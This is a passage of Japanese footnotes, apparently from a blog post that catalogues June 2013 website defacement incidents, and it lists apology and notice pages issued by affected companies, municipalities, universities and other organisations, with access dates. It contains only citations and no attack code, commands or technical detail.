*37:弊社ホームページの改ざんに関するお詫び,テレワークマネジメント,2013/06/05アクセス:魚拓

*38:改ざん被害が発生しました…申し訳ございません。[カラオケスクールお知らせ],☆脱!カラオケコンプレックス,2013/06/04アクセス:魚拓

*39:ホームページ不正改ざんについてのお詫び,エフエム群馬,2013/06/04アクセス:魚拓

*40:ホームページ再開にあたってのご報告,エフエム群馬,2013/06/07アクセス:魚拓

*41:仙台市農作物有害鳥獣対策協議会ホームページの一部が改ざんされました,仙台市,2013/06/04アクセス:魚拓

*42:ご連絡。,ウェブメッセージ,2013/06/06アクセス:魚拓

*43:本学「ホームページ」に関するお詫びとお知らせ,北海道文教大学,2013/06/04アクセス:魚拓

*44:神戸市立桃山台児童館のホームページを閲覧された方へ,神戸市,2013/06/05アクセス:魚拓

*45:日本馬術連盟ホームページの改ざん被害と復旧のご報告,日本馬術連盟,2013/06/05アクセス:魚拓

*46:弊社ホームページの改ざんに関するお詫び,ゆたぷろ,2013/06/05アクセス:魚拓

*47:ホームページ改ざんに関するお知らせとお詫び,能登空港利用促進協議会,2013/06/06アクセス:魚拓

*48:現在、「札幌市ワーク・ライフ・バランス推進事業」HPが閲覧できなくなっています。,札幌市,2013/06/06アクセス:魚拓

*49:札幌市HPがウイルス感染 閲覧者に確認呼び掛け,北海道新聞,2013/06/06アクセス:魚拓

*50:(PDF)当社の関連ホームページをご覧になった皆さまへのお願い,日本想像教育研究所,2013/06/06アクセス

*51:【ホームページ改ざんに関するお詫び − 復旧いたしました】,ビブリオポリ,2013/06/06アクセス:魚拓

*52:【当社サイト改竄に関するお詫び】,アーク,2013/06/06アクセス:魚拓

*53:弊社サイトの改ざんに関するお詫び,アール・ビー・コントロールズ,2013/06/06アクセス:魚拓

*54:ホームページ改ざんに関するお知らせとお詫び,エスペック,2013/06/06アクセス:魚拓

*55:札幌市観光情報サイト「ようこそさっぽろ」停止のお知らせ,札幌市,2013/06/07アクセス:魚拓

*56:札幌市の観光HP、不正アクセス受け閉鎖,読売新聞,2013/06/07アクセス:魚拓

*57:ホームページ一時閉鎖のお知らせ,早稲田スポーツ新聞会,2013/06/07アクセス:魚拓

*58:重要なお知らせ(サイト改ざんの被害について),寺本法律会計事務所,2013/06/07アクセス:魚拓

*59:(PDF)ホームページ改 ホームページ改ざんに関するお知らせとお詫び,函館信用金庫,2013/06/07アクセス

*60:(PDF)当社ホームページ改ざんに関するお詫びとご報告,トヨシマ,2013/06/07アクセス

*61:ホームページ改ざんに関するお知らせ・一時的な閉鎖とお詫び,浜松グリーンウェーブ,2013/06/07アクセス:魚拓

*62:浜松グリーンウェーブ株式会社ウェブサイトへの不正アクセスと改ざん被害の発生について,浜松市,2013/06/07アクセス:魚拓

*63:【当社サイト改竄に関するお詫び】,アーク,2013/06/07アクセス:魚拓

*64:【当社サイト改竄に関するお詫び】,アーク,2013/06/07アクセス:魚拓

*65:ホームページアクセス不能についてのお詫び,上毛新聞TRサービス,2013/06/07アクセス:魚拓

*66:サイトの改ざんに関するお詫び,上毛情報TRサービス,2013/06/24アクセス:魚拓

*67:(PDF)コンピュータウイルス感染のご報告とお詫び,北恵,2013/06/07アクセス

*68:『日報webシステム』サイト改ざんに関する報告とお詫び,アップフィールド,2013/06/07アクセス:魚拓

*69:弊社サイト改ざんに関するお詫びとご説明,一幸陶苑,2013/06/07アクセス:魚拓

*70:AT-X公式ホームページ改ざんに関するお知らせとお詫び,エー・ティー・エックス,2013/06/07アクセス:魚拓

*71:弊社サイトのウィルス感染に関するお詫びとご報告,ミノウラ,2013/06/07アクセス:魚拓

*72:サイト復活しました!,日本デオドール,2013/06/07アクセス:魚拓

*73:【重要】大富士フットボールクラブホームページは安全に閲覧していただけます。,2013/06/07アクセス:魚拓

*74:ファイル改ざん,葉鍼灸院,2013/06/07アクセス:魚拓

*75:ホームページのコンピューターウイルス感染のご報告とお詫び,板橋区立成増小学校支援地域本部,2013/06/07アクセス:魚拓

*76:【CRAZY TVよりホームページに関するお詫びとお知らせ】,CRAZY TV,2013/06/09アクセス:魚拓

*77:ホームページに関するお知らせとお詫び,かなえるリンク,2013/06/09アクセス:魚拓

*78:ホームページ改ざんに関するお知らせとお詫び,緑秀会田無病院2013/06/09アクセス:魚拓

*79:WEBサイト改ざんに関するお詫びとお知らせ,ドゥ・ハウス,2013/06/09:魚拓

*80:ホームページ改ざんに関するお詫びとお知らせ,札幌静修高等学校,2013/06/09アクセス:魚拓

*81:緊急システムメンテナンスのお知らせ,日本文化出版株式会社,2013/06/09アクセス:魚拓

*82:(PDF)ホームページ改ざんに関するお知らせとお詫び,海洋研究開発機構,2013/06/09アクセス

*83:「当サイトの改ざんに関するお詫び」,ゑびすや,2013/06/09アクセス:魚拓

*84:マルウェア警告に関するお詫びとお願い,すみだ産業会館,2013/06/09アクセス:魚拓

*85:電子図書室サービス改ざんに関するお詫びとお知らせ,地盤工学会,2013/06/09アクセス

*86:(PDF)不正アクセスによるホームページの改ざんに関するお詫び,愛知・豊川用水振興協会,2013/06/10アクセス

*87:弊社サイトの改ざんに関するお詫び,栄信電気工業,2013/06/10アクセス:魚拓

*88:当サイトの、全一時停止について・・・,登録紹介宣伝あくせすくん,2013/06/10アクセス:魚拓

*89:当社ホームページのウィルス感染に関するお詫びとお知らせ,日本赤十字社,2013/06/10アクセス:魚拓

*90:当サイト改ざんに関するお知らせとお詫び,HKS,2013/06/11アクセス:魚拓

*91:(PDF)重要なお知らせ ホームページ改ざんに関するお知らせとお詫び,石川県教職員互助会,2013/06/11アクセス

*92:(PDF)弊社ホームページ改ざんに関するお詫びとご報告,アクア,2013/06/11アクセス

*93:[重要なお知らせ]ホームページ改ざんに関するお知らせとお詫び,国立民族学博物館,2013/06/11アクセス:魚拓

*94:当事務所HP改ざんに関するお詫びとお知らせ,長谷川敬税理士事務所,2013/06/11アクセス:魚拓

*95:ホームページ改ざんに関するお知らせとお詫び,TokiwagiFC Fan,2013/06/11アクセス:魚拓

*96:☆友の会HP再開☆,東京こけし友の会,2013/06/11アクセス:魚拓

*97:05月28日から同月31日にかけ、下記3サイトが海外から不正アクセスと改ざんを受けました。,ΜΟΟΥΣΕΊΟΝ,2013/06/11アクセス:魚拓

*98:<重要> 当社ホームページ改ざんに関するお詫び,松菱金属工業,2013/06/13アクセス:魚拓

*99:お客様にお詫びとお願い,日本グラフィックサービス工業会,2013/06/13アクセス:魚拓

*100:「当サイトの改ざんに関するお詫び」,盛岡三菱自動車販売,2013/06/13アクセス:魚拓

*101:ホームページ改ざんに関するお知らせ,北海道文化財団,2013/06/13アクセス:魚拓

*102:お詫びとお知らせ,現代屋,2013/06/13アクセス:魚拓

*103:不正アクセスによるサイト改ざんについて,さうすウェーブ,2013/06/13アクセス:魚拓

*104:当院ウェブサイト改ざんに関するお知らせとお詫び,湘南鎌倉総合病院,2013/06/13アクセス:魚拓

*105:弊社ウェブページ改ざんに関するお知らせ,HASUNA,2013/06/15アクセス:魚拓

*106:ホームページの改ざんに関するお詫びとご報告,日本コンクリート工学会,2013/06/15アクセス:魚拓

*107:(PDF)お詫び,ライオン堂,2013/06/15アクセス

*108:6月3日〜10日の間でアクセスした方はご覧下さい!,あんしん堂,2013/06/19アクセス:魚拓

*109:(PDF)ホームページ改ざんに関するお知らせとお詫び,ニルフィスクアドバンス,2013/06/19アクセス

*110:(PDF)当社ホームページ改ざんに関するお詫びとご報告,ライブラリーコンテンツサービス,2013/06/19アクセス

*111:ウェブサイト改ざんのご報告とお詫び,ヒーリングルーム愛,2013/06/19アクセス:魚拓

*112:(PDF)弊社ホームページの改ざんに関するお詫びとご報告,トヨタ自動車,2013/06/19アクセス

*113:重要なお知らせ(サイト改ざん被害について),中小企業経営革新支援ネットワーク,2013/06/19アクセス:魚拓

*114:重要なお知らせ,DXアンテナ,2013/06/19アクセス:魚拓

*115:「当サイトの改ざんに関するお詫び」,新陽ビニール工業,2013/06/19アクセス:魚拓

*116:(緊急)情報規格調査会Webサイトの改ざんについて,情報処理学会,2013/06/22アクセス:魚拓

*117:弊社サイトのウィルス感染に関するお詫びとご報告,グローバルスズキ,2013/06/22アクセス

*118:当サイトへのWEBサイト改ざん被害について,なんぶの湯,2013/06/22アクセス:魚拓

*119:弊社ホームページ改ざんに関するお知らせとお詫び,サンコンタクトレンズ,2013/06/23アクセス:魚拓

*120:【当サイトの改ざんに関するお詫びとお知らせ】,ときめきドットコム,2013/06/23アクセス:魚拓

*121:ご報告とお詫び,WHO's Generation,2013/06/23アクセス:魚拓

*122:当部サイトのウィルス感染に関するお詫びとご報告,慶應義塾体育会フェンシング部,2013/06/23アクセス:魚拓

*123:お詫び,ナチュラ鍼灸治療院,2013/06/23アクセス:魚拓

*124:【ホームページ改ざんに関する、ご報告】,OliveBeauty,2013/06/23アクセス:魚拓

*125:ホームページのコンピューターウイルス感染のご報告とお詫び,道の駅サザンセトとうわ,2013/06/23アクセス:魚拓

*126:ホームページの改ざんに関するお詫びとお知らせ,FIT,2013/06/30アクセス:魚拓

*127:弊社ホームページの改ざんに関するお詫びとご報告,ウチダレック,2013/06/30アクセス:魚拓

*128:弊社サイト改ざんに関するお知らせとお詫び,榊電業,2013/06/30アクセス:魚拓

*129:不正アクセスによるサイト改ざんに関するご報告,プラスワンリビングハウス,2013/06/30アクセス:魚拓

*130:不正アクセスによるサイト改ざんに関するご報告,東邦レオ,2013/06/30アクセス:魚拓

*131:(PDF)当サイトへの不正アクセス・改ざんに対する注意喚起とお願い,三菱地所,2013/06/30アクセス

*132:二宮町ホームページを閲覧された皆様へ ホームページ改ざんに関するお詫び,二宮町,2013/06/30アクセス:魚拓

*133:■■ホームページ改ざんに関するお知らせとお詫び■■,鹿児島大学 共同獣医学部,2013/06/30アクセス:魚拓

*134:当ホームページに関するお知らせとお詫び,茨城県警備業協会,2013/06/30アクセス:魚拓

*135:重要なお知らせ(サイト改ざんについて),特例民法法人移行手続研究会,2013/06/30アクセス:魚拓

*136:お知らせ,兼進刃物製作所,2013/06/30アクセス:魚拓

*137:ホームページ改ざんに関するお知らせとお詫び,鹿児島大学大学院臨床心理学研究科,2013/06/30アクセス:魚拓